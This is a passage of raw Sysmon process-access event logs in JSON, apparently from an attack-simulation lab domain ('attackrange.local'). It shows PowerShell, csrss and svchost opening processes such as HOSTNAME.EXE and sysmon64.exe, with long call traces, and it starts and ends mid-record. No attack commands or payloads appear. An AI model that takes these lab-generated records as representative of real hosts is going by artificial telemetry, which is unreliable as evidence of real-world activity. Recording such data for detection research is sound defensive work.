\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e250a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001014350800}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66ed2ee2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e250a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663746a0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6637423c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e250a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5150,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001014350800}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001014350800}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5151,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5152,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5153,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5154,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5155,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5156,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5157,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 